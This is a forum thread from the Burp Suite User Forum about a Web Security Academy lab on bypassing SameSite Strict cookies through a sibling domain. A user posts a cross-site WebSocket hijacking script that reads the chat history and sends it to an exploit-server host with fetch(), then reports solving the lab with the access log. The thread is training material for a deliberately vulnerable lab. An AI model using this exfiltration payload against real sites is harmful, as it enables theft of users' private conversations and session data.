Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: SameSite Strict bypass via sibling domain

ghx000 | Last updated: Aug 17, 2024 05:14PM UTC

Hi im trying to solve this lab : Lab: SameSite Strict bypass via sibling domain here s My script : <script> // Create a new WebSocket object that points to /chat endpoint var webSocket = new WebSocket('wss://0a4600ca03a81a23827d33e900660069.web-security-academy.net/chat'); webSocket.onopen = function() { // Send "READY" message to /chat to render the chat history webSocket.send("READY"); }; webSocket.onmessage = function(event) { // Send a GET request with the chat history to exploit server fetch('https://exploit-0ad2004c034c1a9782d3321801630010.exploit-server.net/?'+event.data, {method: 'GET'}); }; </script> but the result chat history for me are just like this : {%22user%22:%22CONNECTED%22,%22content%22:%22--%20Now%20chatting%20with%20Hal%20Pline%20--%22} any tips or hints thats help ?

Ben, PortSwigger Agent | Last updated: Aug 19, 2024 08:10AM UTC

Hi, To confirm, this lab requires the use of the Collaborator tool - are you using Burp Professional or Burp Community edition?

ghx000 | Last updated: Aug 19, 2024 09:29AM UTC

Hi im using Community edition i solved this lab with help of access log Thanks For Reponde

ghx000 | Last updated: Aug 19, 2024 09:30AM UTC

Responde *

Ben, PortSwigger Agent | Last updated: Aug 19, 2024 11:59AM UTC